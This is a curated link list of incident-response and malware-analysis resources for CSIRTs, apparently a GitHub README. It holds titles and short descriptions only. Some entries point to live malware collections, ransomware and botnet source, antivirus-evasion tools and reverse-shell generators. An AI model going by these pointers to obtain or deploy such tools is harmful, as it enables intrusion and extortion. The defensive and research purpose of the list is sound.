CSIRT

*Please contribute through pull requests- ;)

Another great list: awesome-incident-response

Books

• Nice list here by Cert.BR
• Practical Cryptography for Developers, github
• The Book of Secret Knowledge
• Security Engineering — Third Edition
• The Cyber Plumber's Handbook

Links

• FIRST
  • Malware Analysis Resources
• Cert.BR - useful links
  • 7º Fórum Brasileiro de CSIRTs
  • 9º Fórum Brasileiro de CSIRTs
• SANS Pen-Testing Resources: Downloads
• Some list of security projects
• APT & CyberCriminal Campaign Collection
• Encoding vs. Encryption vs. Hashing vs. Obfuscation
• Shodan: is the world's first search engine for Internet-connected devices. Shodan 2000
• CriminalIP: Criminal IP is a specialized Cyber Threat Intelligence (CTI) search engine that allows users to search for various security-related information such as malicious IP addresses, domains, banners, etc. It can be widely integrated
• hacking-tutorials
• crypto: Lecture notes for a course on cryptography
• tink: Tink is a multi-language, cross-platform library that provides cryptographic APIs that are secure, easy to use correctly, and hard(er) to misuse.
• SPLOITUS: Exploit search engine.
• Vulmon: Vulmon is a vulnerability search engine.
• CIS SecureSuite® Membership
• CRYPTO101: Crypto 101 is an introductory course on cryptography, freely available for programmers of all ages and skill levels.
• SMHasher is a test suite designed to test the distribution, collision, and performance properties of non-cryptographic hash functions. another repo
• CPDoS: Cache Poisoned Denial of Service
• cacao: OASIS CACAO TC: Official repository for work of the CACAO TC
• cti-documentation
• The 4th in the 5th: Temporal Aspects of Cyber Operations
• SOCless: The SOCless automation framework
• Open CSIRT Foundation - SIM v3 Model and SIM3 Self Assessment.
• Global Forum on Cyber Expertise (GFCE).
• Ten strategies of a world-class cybersecurity operations center
• my-infosec-awesome.
• How to Secure Anything. How to systematically secure anything: a repository about security engineering
• Metasploitable3: is a VM that is built from the ground up with a large amount of security vulnerabilities.
• Institute for Security and Technology: builds solutions to enhance the security of the global commons. Our goal is to provide the tools and insights needed for companies and governments to outpace emerging global security threats. Our non-traditional approach has a bias towards action, as we build trust across domains, provide unprecedented access, and deliver and implement solutions.
• NIST'S CYBERSECURITY FRAMEWORK
• pluto-eris: Generator and supporting evidence for security of the Pluto/Eris half-pairing cycle of elliptic curves.
• cset: Cybersecurity Evaluation Tool by CISA.gov.
• comply: Compliance automation framework, focused on SOC2.
• Illustrated X.509 Certificate
• Open Security Controls Assessment Language (OSCAL): NIST is developing the Open Security Controls Assessment Language (OSCAL), a set of hierarchical, XML-, JSON-, and YAML-based formats that provide a standardized representations of information pertaining to the publication, implementation, and assessment of security controls.
• DWF: The DWF Identifiers dataset, distributed weakness filing.
• OASIS Common Security Advisory Framework (CSAF) repo secvisogram editor
• notrandom: reverse the Mersenne Twister.
• OpenEX: Crisis drills planning platform. repo
• NCSI: The National Cyber Security Index is a global index, which measures the preparedness of countries to prevent cyber threats and manage cyber incidents.
• THE EVOLUTION OF TRUST

Incident Response

• Applying DevOps Principles in Incident Response
• Pagerduty Incident Response: This documentation covers parts of the PagerDuty Incident Response process.
  • security-training: Public version of PagerDuty's employee security training courses.
  • incident-response-docs: PagerDuty's Incident Response Documentation.
• global-irt: Global IRT (Incident Response Team) is a project to describe common IRT and abuse contact information
• atc-react: A knowledge base of actionable Incident Response techniques
• Request Tracker for Incident Response
• Request Tracker
• Beagle is an incident response and digital forensics tool which transforms security logs and data into graphs.
• CSIRT Schiltron: Training, Techniques, and Talent
• Practical Tabletop Drills for CSIRTS - Pre-session Material
• DFIRTrack: The Incident Response Tracking Application
• FIR (Fast Incident Response): is an cybersecurity incident management platform designed with agility and speed in mind.
• Aurora Incident Response: Incident Response Documentation made easy. Developed by Incident Responders for Incident Responders.
• timesketch: Collaborative forensic timeline analysis.
• FastIR Collector Linux (no longer maintained)
• Critical Log Review Checklist for Security Incidents
• Exercise in a Box
• Incident response overview
• How to Write and Execute Great Incident Response Playbooks
• Incident Response: Windows Cheatsheet
• Incident Response: Windows Account Logon and logon Events
• Incident Response: Windows Account Management Event (Part 2)
• Incident Response- Linux Cheatsheet
• Building Better CSIRTs Using Behavioral Psychology link
• The features all Incident Response Plans need to have
• Maltrail: Malicious traffic detection system

Hashing

• MD5 Decryption
• SHA-1 is a Shambles: First Chosen-Prefix Collision on SHA-1 and Application to the PGP Web of Trust
• Sha256 Algorithm Explained code

CVEs

• Some CVEs stuff and links here and in here
• MikroTik search on shodan.
• TROMMEL: Sift Through Directories of Files to Identify Indicators That May Contain Vulnerabilities
• cve_manager: A python script that a) parses NIST NVD CVEs, b) prcoesses and exports them to CSV files, c) creates a postgres database and imports all the data in it, d) provides query capabilities for this CVEs database.
• dorkbot: Command-line tool to scan Google search results for vulnerabilities.
• NotQuite0DayFriday: This is a repo which documents real bugs in real software to illustrate trends, learn how to prevent or find them more quickly.
• Exploit Prediction Scoring System (EPSS): The Exploit Prediction Scoring System (EPSS) is an open, data-driven effort for predicting when software vulnerabilities will be exploited. Our goal is to assist network defenders to better prioritize vulnerability remediation efforts.
• CVE PoC: Almost every publicly available CVE PoC.

Malware Analysis

• Awesome Malware Analysis: A curated list of awesome malware analysis tools and resources.
• Great online course by MalwareUnicorn
• CS6038/CS5138 Malware Analysis, UC: Introduction to Malware Analysis and Reverse Engineering
• Some other botnets list
• IKARUS anti.virus and its 9 exploitable kernel vulnerabilities
• Digital Certificates Used by Malware
• Signed Malware – The Dataset
• Malware Sample Sources for Researchers
• Indicators: Champing at the Cyberbit
• Limon - Sandbox for Analyzing Linux Malwares
• A Dynamic Binary Instrumentation framework based on LLVM
• Framework for building Windows malware, written in C++
• binary ninja
• Analyzing a New macOS DNS Hijacker: OSX/MaMi
• A PoC "malware" application with good intentions that aims to stress your anti-malware system: al-khaser
• Great analysis of mal100.evad.spre.rans.spyw.troj.winEXE@34/9@31/10
• Chaos: a Stolen Backdoor Rising Again
• Malware Indicators of Compromise (IOCs)
• Puszek: Yet another LKM rootkit for Linux. It hooks syscall table.
• Joe Sandbox Cloud is a deep malware analysis platform which detects malicious files - API Wrapper.
• Cuckoo Sandbox: Automated Malware Analysis.
• CBG: Cuckoo Breeding Ground Hash Table.
• EternalGlue part two: A rebuilt NotPetya gets its first execution outside of the lab
• Malware web and phishing investigation by Decent Security.
• A collection of tools for working with TrickBot
• Forgot About Default Accounts? No Worries, GoScanSSH Didn’t
• makin - reveal anti-debugging and anti-VM tricks.
• TESSERACT: Eliminating Experimental Bias in Malware Classification across Space and Time
• colental/byob: BYOB (Build Your Own Botnet), another byob
• Source Code for Exobot Android Banking Trojan Leaked Online
• Ramnit’s Network of Proxy Servers
• snake: a malware storage zoo
• A malware analysis kit for the novice
• malware-ioc: Indicators of Compromises (IOC) of our various investigations
• pftriage: Python tool and library to help analyze files during malware triage and analysis.
• imaginaryC2: Imaginary C2 is a python tool which aims to help in the behavioral (network) analysis of malware. Imaginary C2 hosts a HTTP server which captures HTTP requests towards selectively chosen domains/IPs. Additionally, the tool aims to make it easy to replay captured Command-and-Control responses/served payloads.
• When a malware is more complex than the paper.
• Vba2Graph: Vba2Graph - Generate call graphs from VBA code, for easier analysis of malicious documents.
• malwoverview: Malwoverview.py is a first response tool to perform an initial and quick triage on either a directory containing malware samples or a specific malware sample.
• SECT CTF 2018 :: Gh0st, More Smoked Leet Chicken
• What you need to know about “LoJax”—the new, stealthy malware from Fancy Bear
• Linux.Malware: Additional Material for the Linux Malware Paper
• PHP Malware Examination
• Analysis of Linux.Haikai: inside the source code
• Cylance vs. MBRKiller Wiper Malware.
• Deep Analysis of TrickBot New Module pwgrab
• multiscanner: Modular file scanning/analysis framework.
• FCL: FCL (Fileless Command Lines) - Known command lines of fileless malicious executions.
• Mac malware combines EmPyre backdoor and XMRig miner
• The Full Guide Understanding Fileless Malware Infections
• 'Injection' Without Injection
• Analysis of Neutrino Bot Sample (dated 2018-08-27): In this post I analyze a Neutrino Bot sample.
• pafish: Pafish is a demonstration tool that employs several techniques to detect sandboxes and analysis environments in the same way as malware families do.
• Thunderstrike2 details: This is the annotated transcript of our DefCon 23 / BlackHat 2015 talk, which presented the full details of Thunderstrike 2, the first firmware worm for Apple's Macs that can spread via both software or Thunderbolt hardware accessories and writes itself to the boot flash on the system's motherboard.
• Malboxes: a Tool to Build Malware Analysis Virtual Machines, github
• Triton is the world’s most murderous malware, and it’s spreading
• Cloak and Dagger — Mobile Malware Techniques Demystified
• IceBox: Icebox is a Virtual Machine Introspection solution that enable you to stealthily trace and debug any process (kernel or user). It's based on project Winbagility.
• Malware Development:
  • Welcome to the Dark Side: Part 1
  • Welcome to the Dark Side: Part 2-1
  • Welcome to the Dark Side: Part 2-2
  • Welcome to the Dark Side: Part 3
  • Welcome to the Dark Side: Part 4
• Command and Control via TCP Handshake
• Joel Sandbox Analysis Report wdeQEksXgm
• emotet: Daily Emotet IoCs and Notes for 09/18/19
• Aleph: OpenSource /Malware Analysis Pipeline System
• Aleph: File Analysis Pipeline
• Anti-VM Technique with MSAcpi_ThermalZoneTemperature, powershell
• AMSI as a Service — Automating AV Evasion: AMSI, the “AntiMalware Scan Interface”, has been around for some time. In a broad sense, it’s a component of Windows 10 which allows applications to integrate with AV products, though most people know it for it’s ability to make file-less malware visible to AV engines.
• A collection of x64dbg scripts. Feel free to submit a pull request to add your script.
• CAPA: The FLARE team's open-source tool to identify capabilities in executable files. capa-rules
• DRAKVUF Sandbox - automated hypervisor-level malware analysis system.
• Unprotect: The search engine about Malware Evasion Techniques
• HiJackThis Fork v3: A free utility that finds malware, adware and other security threats.
• FRITZFROG: A NEW GENERATION OF PEER-TO-PEER BOTNETS. detection script
• Tracking A Malware Campaign Through VT
• speakeasy: Windows kernel and user mode emulation.
• malware analysis and machine learning If you are new to machine learning and want to start learning about building models to classify malware, I recommend the following
• GhostDNSbusters: Illuminating GhostDNS Infrastructure
• The Tetrade: Brazilian banking malware goes global
• Is macOS under the biggest malware attack ever?: EvilQuest/ThiefQuest malware.
• Hybrid Analysis
• Evading Static Machine Learning Malware Detection Models – Part 1: The Black-Box Approach
• ember: The EMBER dataset is a collection of features from PE files that serve as a benchmark dataset for researchers.
• Complementar resources to follow the EHREM course by GoHacking (Malware Reverse Engineering)
• Coldfire: Golang malware development library
• pei, the PE Injector - Inject code on 32-bit and 64-bit PE executables
• The Art Of Mac Malware: Analysis
• Freki:  Malware analysis platform
• Ten process injection techniques: A technical survey of common and trending process injection techniques
• Sandbox detection and evasion techniques. How malware has evolved over the last 10 years
• malware_training_vol1: Materials for Windows Malware Analysis training (volume 1).
• Go Assembly on the arm64
• Exploit Kit still sharpens a sword
• Pingback: Backdoor At The End Of The ICMP Tunnel.
• WinAPI-Tricks: Collection of various WINAPI tricks / features used or abused by Malware.
• pyWhat: Identify anything. pyWhat easily lets you identify emails, IP addresses, and more. Feed it a .pcap file or some text and it'll tell you what it is!
• Transacted Hollowing: a PE injection technique, hybrid between ProcessHollowing and ProcessDoppelgänging.
• Cuckoo Sandbox Overview
• Malvuln: Finding and exploiting vulnerable Malware.
• Machine Learning for Static Malware Analysis, with University College London
• Malware Scarecrow
• Vigilante malware rats out software pirates while blocking ThePirateBay. twitter thread
• Necro Python bot adds new exploits and Tezos mining to its bag of tricks
• Too Log; Didn't Read — Unknown Actor Using CLFS Log Files for Stealth: The Mandiant Advanced Practices team recently discovered a new malware family we have named PRIVATELOG and its installer, STASHLOG.
• Made in China: OSX.ZuRu: trojanized apps spread malware, via sponsored search results
• DBatLoader: Abusing Discord to Deliver Warzone RAT
• Siloscape: First Known Malware Targeting Windows Containers to Compromise Cloud Environments
• DRIDEX: Analysing API Obfuscation Through VEH
• The Return of the Malwarebytes Crackme, Malwarebytes Crackme 2021: Writeup and scripts for the 2021 malwarebytes crackme. Malwarebytes CrackMe 3 2021 Solution
• Corvus: is a dynamic analysis system for malware targeting Windows, Linux, Android and PDFs. Behavioral heuristics are also applied to identify suspicious activities exhibited by unknown programs. API
• MalAPI.io maps Windows APIs to common techniques used by malware.
• Malicious Document Analysis: Example 1 mda
• APIVADS: A Novel Privacy-Preserving Pivot Attack Detection Scheme Based On Statistical Pattern Recognition
• A new secret stash for “fileless” malware
• Qu1cksc0pe: All-in-One malware analysis tool.

Web Malwares

• Boa release is an experimental Javascript lexer, parser and compiler written in Rust.
• midrashim: x64 ELF infector written in Assembly
• d0zer: Elf binary infector written in Go.
• New evasion techniques found in web skimmers
• digital skimming / #magecart technique for injecting convincing PayPal iframes into the checkout process. paypal endpoint called via cors-anywhere, stega-loader, paypal-cors-deob-good.js, paypal-cors-deob-with-comments.js, fake-paypal.html

Malware Samples

• Automated Malware Analysis Report for D6pnpvG2z7 - Generated by Joe Sandbox
• Mac Malware
• virii: Collection of ancient computer virus source codes
• Detricking TrickBot Loader: TrickBot (TrickLoader) is a modular financial malware that first surfaced in October in 20161. Almost immediately researchers have noticed similarities with a credential-stealer called Dyre. It is still believed that those two families might’ve been developed by the same actor. decoder, tweet
• Analysis of Emotet v4
• abuse.ch Feodo Tracker Botnet C2 IP Blocklist
• simple_ransomware: this script isn't ransomware, it's just script collect all your system files and encrypt it, Can be considered it a simple ransomware
• Mirai "Batkek"
• FinFisher Filleted 🐟, a triage of the FinSpy (macOS) malware
• Ryuk’s Return
• Ryuk Ransomware: Extensive Attack Infrastructure Revealed
• Collaboration between FIN7 and the RYUK group, a Truesec Investigation
• Android-Malware-Samples: Android Malware Samples
• Architecture of a ransomware
• TRAFFIC ANALYSIS EXERCISE - OMEGACAST
• Malware Samples: Malware samples and other artifacts
• After finding skimmers in SVG files last week, we now discovered a #magecart skimmer in perfectly valid CSS.
• #Buer #BuerLoader
• SoReL-20M: Sophos-ReversingLabs 20 million sample dataset.
• minizinh0-FUD: A Fully Undetectable Ransomware.
• Purple Fox Rootkit Now Propagates as a Worm
• How to analyze mobile malware: a Cabassous/FluBot Case study
• Malware Analysis of a Password Stealer: n this video we dive into the analysis of Poulight malware, which is a .net based password stealer.
• Guildma
• Darkside RaaS in Linux version

Repos

• A repository of LIVE malwares for your own joy and pleasure: theZoo
• malware.one is a binary substring searchable malware catalog containing terabytes of malicious code.
• Beginner Malware Reversing Challenges, by MalwareTech. repo
• MalwareWorld: Check for Suspicious Domains and IPs. Repo: MalwareWorld: System based on +500 blacklists and 5 external intelligences to detect internet potencially malicious hosts
• C2Matrix: The goal of this site is to point you to the best C2 framework for your needs based on your adversary emulation plan and the target environment
• LOLBITS: C2 framework that uses Background Intelligent Transfer Service (BITS) as communication protocol and Direct Syscalls + Dinvoke for EDR user-mode hooking evasion.
• MalwareBazaar: is a project from abuse.ch with the goal of sharing malware samples with the infosec community, AV vendors and threat intelligence providers.
• What is MWDB Core? mwdb-core: Malware repository component for samples & static configuration with REST API interface.
• Malpedia: The primary goal of Malpedia is to provide a resource for rapid identification and actionable context when investigating malware. Openness to curated contributions shall ensure an accountable level of quality in order to foster meaningful and reproducible research.

Ransomwares

• Ransomware decryption tool
• Schroedinger’s Pet(ya)
• Player 3 Has Entered the Game: Say Hello to 'WannaCry'
• WannaCry|WannaDecrypt0r NSA-Cyberweapon-Powered Ransomware Worm
• Ransomware Overview
• Analyzing GrandSoft Exploit Kit and code
• Rapidly Evolving Ransomware GandCrab Version 5 Partners With Crypter Service for Obfuscation
• hidden-tear: It's a ransomware-like file crypter sample which can be modified for specific purposes.
• Tracking REvil: This blog describes our efforts in tracking the REvil ransomware and its affiliates for the past six months. REvil has been around since 2019 and is one of the top variants of ransomware causing havoc at many organizations around the globe ever since. The KPN Security Research Team was able to acquire C2 sinkholes allowing for the tracking of infections across the globe.
• Sodinokibi (aka REvil) Ransomware. Sodinokibi (aka REvil) Ransomware
• REvil Master Key for Kaseya Attack Posted to XSS
• After the ransom was paid, the attackers even provided some bonus security advice!
• Phirautee: A proof of concept crypto virus to spread user awareness about attacks and implications of ransomwares. Phirautee is written purely using PowerShell and does not require any third-party libraries. This tool steals the information, holds an organisation’s data to hostage for payments or permanently encrypts/deletes the organisation data.
• Sophisticated new Android malware marks the latest evolution of mobile ransomware
• Raccine: A Simple Ransomware Vaccine
• Genetic Analysis of CryptoWall Ransomware
• Brazilian Justice Court Ransomware: Another piece in the Puzzle
• A Ransomware has landed! @Embraer by SECRET
• RANSOMWARE GUIDANCE AND RESOURCES
• No More Ransom!
• PYSA/Mespinoza Ransomware
• PYSA Ransomware
• Mespinoza Analysis — New ransomware variant targets France
• Some #PYSA / #Mespinoza #Ransomware Samples
• Cerber Ransomware
• RansomEXX Trojan attacks Linux systems
• FIN7 - Lizar client Interface version 2.0.4 tweet
• Introducing COLT – Compromise to Leak Time
• RANSOM MAFIA.ANALYSIS OF THE WORLD’S FIRST RANSOMWARE CARTEL
• Sleuthing DarkSide Crypto-Ransom Payments with the Wolfram Language
• Apostle Ransomware Analysis
• From Wiper to Ransomware | The Evolution of Agrius
• Smoking Out a DARKSIDE Affiliate’s Supply Chain Software Compromise
• Hades Ransomware Operators Use Distinctive Tactics and Infrastructure
• Miscellaneous Malware RE
• BlackMatter x64 Linux Variant | esxcli variant, blackmatter functions
• Teaching an Old Dog New Tricks: 2017 Magniber Ransomware Uses PrintNightmare Vulnerability to Infect Victims in South Korea
• RansomExx Renner
• RANSOMWHERE: Total tracked ransomware payments all time. Ransomwhere is the open, crowdsourced ransomware payment tracker. Browse and download ransomware payment data or help build our dataset by reporting ransomware demands you have received.
• BlackByteDecryptor: This is a decryptor for the ransomware BlackByte.
• Ransomware Actor Abuses Genshin Impact Anti-Cheat Driver to Kill Antivirus: We investigate mhyprot2.sys, a vulnerable anti-cheat driver for the popular role-playing game Genshin Impact. The driver is currently being abused by a ransomware actor to kill antivirus processes and services for mass-deploying ransomware.

Virus/Anti-Virus

• Avast open-sources its machine-code decompiler
• Morris worm
• make a process unkillable?! (windows 10)
• Attack inception: Compromised supply chain within a supply chain poses new risks – Microsoft Secure.
• Curtis' Blog: Bypassing Next Gen AV During a Pentest
• Inception: Provides In-memory compilation and reflective loading of C# apps for AV evasion.
• Invoke-NeutralizeAV: Quick PoC I Wrote for Bypassing Next Gen AV Remotely for Pentesting.
• BinariesThatDoesOtherStuff.
• Circlean: USB key cleaner.
• The ELF Virus Writing HOWTO.
• mcreator: Encoded Reverse Shell Generator With Techniques To Bypass AV's.
• metame: is a simple metamorphic code engine for arbitrary executables.
• rustdsplit: At some point, I learned about a method to perform a binary search on a file in order to identify its AV signature and change it to bypass signature-based AV. The tool I used back then is gone, so I wrote this.
• Virus Total API in Python
• VirusTotal CLI
• rustdsplit: At some point, I learned about a method to perform a binary search on a file in order to identify its AV signature and change it to bypass signature-based AV. The tool I used back then is gone, so I wrote this.
• Antivirus Event Analysis Cheat Sheet v1.7.2
• UglyEXe: bypass some AVs
• How to bypass Defender in a few easy steps
• Engineering antivirus evasion
• avcleaner: C/C++ source obfuscator for antivirus bypass
• An Empirical Assessment of Endpoint Security Systems Against Advanced Persistent Threats Attack Vectors
• VxSig: Automatically generate AV byte signatures from sets of similar binaries.

Trojans/Loggers

• IcedID Banking Trojan Shares Code with Pony 2.0 Trojan
• Turla: In and out of its unique Outlook backdoor
• QMKhuehuebr: Trying to hack into keyboards

Malware Articles and Sources

• “VANILLA” malware: vanishing antiviruses by interleaving layers and layers of attacks
• A Mix of Python & VBA in a Malicious Word Document
• MalwareAnalysisForHedgehogs: Throw your bat cape over your spikes and get started with malware analysis and reverse engineering. I work as a malware analyst and like to share my knowledge.
• 2020-10-22 - TRAFFIC ANALYSIS EXERCISE - OMEGACAST
• EMOTET: EMOTET INFECTIONS WITH ZEUS PANDA BANKER AND TRICKBOT (GTAG: DEL34)
• A MIPS-32 ELF non-resident virus with false disassembly, Made with love by S01den (@s01den)
• Linux.Kropotkine.asm
• A WILD KOBALOS APPEARS, Tricksy Linux malware goes after HPCs. kobalos iocs
• List of victim organizations attacked by Ransomware gangs released on the DarkWeb

Reverse Engineering

• (pt-br) Fundamentos de Engenharia Reversa
• Reverse Engineer's Toolkit
• Dangers of the Decompiler
• RE guide for beginners: Methodology and tools
• REDasm: Crossplatform, interactive, multiarchitecture disassembler
• Reversing ARM Binaries
• Programmer De-anonymization from Binary Executables
• Reverse engineering WhatsApp Web
• BOLO: Reverse Engineering — Part 1 (Basic Programming Concepts)
• BOLO: Reverse Engineering — Part 2 (Advanced Programming Concepts)
• Reverse Engineering for Beginners
• VivienneVMM: VivienneVMM is a stealthy debugging framework implemented via an Intel VT-x hypervisor.
• Xori: Custom disassembly framework
• rattle: Rattle is an EVM binary static analysis framework designed to work on deployed smart contracts.
• starshipraider: High performance embedded systems debug/reverse engineering platform
• GBA-IDA-Pseudo-Terminal: IDAPython tools to aid with analysis, disassembly and data extraction using IDA python commands, tailored for the GBA architecture at some parts
• binja-ipython: A plugin to integrate an IPython kernel into Binary Ninja.
• PySameSame: This is a python version of samesame repo to generate homograph strings
• Reversing a Japanese Wireless SD Card From Zero to Code Execution
• Practical-Reverse-Engineering-using-Radare2: Training Materials of Practical Reverse Engineering using Radare2
• Reverse engineering Go binaries using Radare 2 and Python
• r2pipe for V: r2pipe for V.
• radare2-webui: webui repository for radare2.
• IDA Pro:
  • idaemu: idaemu is an IDA Pro Plugin - use for emulating code in IDA Pro.
  • lighthouse: Code Coverage Explorer for IDA Pro & Binary Ninja
  • IDAPro Cheat Sheet
  • Lumen: A private Lumina server for IDA Pro
  • EFISwissKnife: An IDA plugin to improve (U)EFI reversing.
  • IDA Python
  • Tenet: A Trace Explorer for Reverse Engineers.
  • TLS callbacks
  • rename gamemaker handlers
• GDB:
  • pwndbg: Exploit Development and Reverse Engineering with GDB Made Easy
  • PEDA: Python Exploit Development Assistance for GDB.
  • about gef. gef: GDB Enhanced Features for exploit devs & reversers.
  • some things about gef
  • Controlling GDB
  • Low Level Visualization via Debuggers
  • Faster GDB Startup
• Frida:
  • Getting Started with Frida Tools
  • Frida hooking android :part 1, part 2, part 3, part 4 and part 5
  • fridump3: A universal memory dumper using Frida for Python 3.
  • r2flutch: Tool to decrypt iOS apps using r2frida.
• Immunity:
  • Immunity Debugger
  • mona site. mona: is a python script that can be used to automate and speed up specific searches while developing exploits (typically for the Windows platform). It runs on Immunity Debugger and WinDBG, and requires python 2.7. Although it runs in WinDBG x64, the majority of its features were written specifically for 32bit processes.
• LIEF: Library to Instrument Executable Formats (github)
• DEBIN: Predicting Debug Information in Stripped Binaries
• Analyzing ARM Cortex-based MCU firmwares using Binary Ninja
• Manticore: Symbolic Execution Tool For Analysis Of Binaries And Smart Contracts. manticore: Symbolic execution tool
• Beam me up, CFG.: Earlier in 2018 while revisiting the Delay Import Table, I used dumpbin to check the Load Configuration data of a file and noticed new fields in it. And at the time of writing this, more fields were added! The first CFGuard caught my attention and I learned about Control Flow Guard, it is a new security feature. To put it simple, it protects the execution flow from redirection - for example, from exploits that overwrite an address in the stack. Maybe they should call it the Security Directory instead.
• PBA - Analysis Tools: My own versions from the programs of the book "Practical Binary Analysis"
• functrace: is a tool that helps to analyze a binary file with dynamic instrumentation using DynamoRIO
• Signature-Base: signature-base is the signature database for my scanners LOKI and SPARK Core.
  • Generic Anomalies: Detects an embedded executable in a non-executable file
• Virtuailor: IDAPython tool for C++ vtables reconstruction.
• Linux Reverse Engineering CTFs for Beginners.
• execution-trace-viewer: Tool for viewing and analyzing execution traces
• Reverse Engineering of a Not-so-Secure IoT Device
• ELF - Executable and Linkable Format:
  • Python for Reverse Engineering 1: ELF Binaries
  • The 101 of ELF files on Linux: Understanding and Analysis - Linux Audit
  • On ELF, Part 1
  • On ELF, Part 2
• Kaitai Struct: A new way to develop parsers for binary structures.
• findLoop: find possible encryption/decryption or compression/decompression code.
• Reverse Engineering 'A Link to the Past (GBA)' ep 1
• wiggle: The concepting self hosted executable binary search engine.
• uncompyle6: A cross-version Python bytecode decompiler
• Decompyle++: C++ python bytecode disassembler and decompiler
• bearparser. PE-bear
• Reverse-engineering precision op amps from a 1969 analog computer
• CPU Adventure – Unknown CPU Reversing: We reverse-engineered a program written for a completely custom, unknown CPU architecture, without any documentation for the CPU (no emulator, no ISA reference, nothing) in the span of ten hours. Read on to find out how we did it…
• pev: pev is a full-featured, open source, multiplatform command line toolkit to work with PE (Portable Executables) binaries.
• Sourcetrail: free and open-source cross-platform source explorer.
• Qiling Framework: Qiling Advanced Binary Emulation Framework. repo
• Obfuscation/Deobfuscation:
  • batch_deobfuscator: Deobfuscate batch scripts obfuscated using string substitution and escape character techniques.
  • Tales Of Binary Deobfuscation - Part 1
  • evilquest_deobfuscator: EvilQuest/ThiefQuest malware strings decrypter/deobfuscator. evilquest_stats: Small utility to hash EvilQuest code and cstrings sections.
  • Deobfuscating DanaBot’s API Hashing
  • XLMMacroDeobfuscator: Extract and Deobfuscate XLM macros (a.k.a Excel 4.0 Macros)
  • syntia: Program synthesis based deobfuscation framework for the USENIX 2017 paper "Syntia: Synthesizing the Semantics of Obfuscated Code"
  • Deobfuscation: recovering an OLLVM-protected program
  • Stadeo: Control-flow-flattening and string deobfuscator
  • Semi-Automatic Code Deobfuscation
  • msynth: Code deobfuscation framework to simplify Mixed Boolean-Arithmetic (MBA) expressions.
• Glasgow Debug Tool: Scots Army Knife for electronics
• windbglib: Public repository for windbglib, a wrapper around pykd.pyd (for Windbg), used by mona.py
• VX Underground
  • MalwareSourceCode: Collection of malware source code for a variety of platforms in an array of different programming languages.
  • VXUG-Papers: Research code & papers from members of vx-underground.
• (pt-br) Como automaticamente atachar um processo a um debugger.
• Taming Virtual Machine Based Code Protection
• HyperDbg Debugger: The Source Code of HyperDbg Debugger
• The HT Editor: A file editor/viewer/analyzer for executables.
• ImHex: A Hex Editor for Reverse Engineers, Programmers and people that value their eye sight when working at 3 AM.
• playing with little endian
• Finding memory bugs with AddressSanitizer
• flare-floss: : FireEye Labs Obfuscated String Solver - Automatically extract obfuscated strings from malware.
• #BazarBackdoor Group #CobaltStrike Payload
• The Debugging Book: Tools and Techniques for Automated Software Debugging.
• Debugging System with DCI and Windbg. Plus, accompanying my first kernel-to-SMM LPE exploit & demo, SmmExploit.
• SCAS/SCASB/SCASW/SCASD: Scan String, x86 Instruction Set Reference.
• dexcalibur: Android reverse engineering tool focused on dynamic instrumentation automation leveraging Frida. It disassembles dex, analyzes it statically, generates hooks, discovers reflected methods, stores intercepted data and does new things from it. Its aim is to be an all-in-one Android reverse engineering platform.
• Reverse-engineering tcpip.sys: mechanics of a packet of the death (CVE-2021-24086)
• rr: Record and Replay Framework.
• panda: Platform for Architecture-Neutral Dynamic Analysis.
• qira: QEMU Interactive Runtime Analyser.
• qemu_blog: A series of posts about QEMU internals.
• Reverse engineering (Absolute) UEFI modules for beginners
• miasm: Reverse engineering framework in Python
• rehex: Reverse Engineers' Hex Editor.
• Bless: Gtk# Hex Editor (fork)
• Reverse Engineering the M6 Smart Fitness Bracelet
• Reverse Engineering a Linux executable – hello world
• rizin: UNIX-like reverse engineering framework and command-line toolset. site
• reFlutter: Flutter Reverse Engineering Framework.
• OpenSecurityTraining2: OpenSecurityTraining Inc. (EIN 86-1180701) is a 501c3 non-profit working to create the world's best cybersecurity training.
• Nightmare is an intro to binary exploitation / reverse engineering course based around ctf challenges.
• Breaking Protocol (Buffers): Reverse Engineering gRPC Binaries
• Sometimes static analysis of shellcode is annoying or infeasible, And what you really want to do is debug it, I'll show you how.
• capa: The FLARE team's open-source tool to identify capabilities in executable files.
• aDLL - Adventure of Dinamic Lynk Library: aDLL is a binary analysis tool focused on the automatic discovery of DLL Hijacking vulnerabilities. The tool analyzes the image of the binary loaded in memory to search for DLLs loaded at load-time and makes use of the Microsoft Detours library to intercept calls to the LoadLibrary/LoadLibraryEx functions to analyze the DLLs loaded at run-time.
• pyc2bytecode: A Python Bytecode Disassembler helping reverse engineers in dissecting Python binaries by disassembling and analyzing the compiled python byte-code(.pyc) files across all python versions (including Python 3.10.*)
• Reverse Engineering PsExec for fun and knowledge
• Reverse Engineering TikTok's VM Obfuscation

Decompilers

• decompile_java, using CFR - another java decompiler.
• NoVmp: A static devirtualizer for VMProtect x64 3.x powered by VTIL.
• Awesome IDA, x64DBG & OllyDBG plugins: A curated list of IDA x64DBG and OllyDBG plugins.
• edb is a cross-platform AArch32/x86/x86-64 debugger.
• Interactive Delphi Reconstructor IDR: a decompiler of executable files (EXE) and dynamic libraries (DLL), written in Delphi and executed in Windows32 environment.
• PyInstaller Extractor

Yara

• Yara-Rules: Repository of yara rules
• Repository containing Indicators of Compromise and Yara rules
• YARA in a nutshell
• yara: The pattern matching swiss knife
• mkYARA: Writing YARA rules for the lazy analyst (github)
• Yara-Rules: Repository of YARA rules made by McAfee ATR Team.
• ReversingLabs YARA Rules
• YaraHunts: Random hunting ordiented yara rules
• YARA Rules for ProcFilter
• ThreatHunting
• yara-validator: Validates yara rules and tries to repair the broken ones.
• Vim Syntax Highlighting for YARA Rules: A Vim syntax-highlighting file for YARA rules covering YARA 4.0
• Rules DB:
  • xored_pefile_mini: detects files with a PE header at uint32(0x3c), xored with a key of 1, 2 or 4 bytes. by tlansec

Ghidra

• ghidra: is a software reverse engineering (SRE) framework
• ghidra-firmware-utils: Ghidra utilities for analyzing firmware
• dragondance: Binary code coverage visualizer plugin for Ghidra
• Decompiler Analysis Engine: Welcome to the Decompiler Analysis Engine. It is a complete library for performing automated data-flow analysis on software, starting from the binary executable.
• Working With Ghidra's P-Code To Identify Vulnerable Function Calls
• GhIDA: Ghidra decompiler for IDA Pro.
• Ghidraaas: Ghidra as a Service
• SVD-Loader for Ghidra: Simplifying bare-metal ARM reverse engineering. repo
• GhidraX64Dbg: Extract annoations from Ghidra into an X32/X64 dbg database.
• Reverse Engineering Go Binaries with Ghidra
• Introduction to Reverse Engineering with Ghidra: A Four Session Course
• Ghidra Plugin Development for Vulnerability Research - Part-1
• AngryGhidra: Use angr in Ghidra
• Defeating Code Obfuscation with Angr
• ghidra2frida: The new bridge between Ghidra and Frida. repo scripts
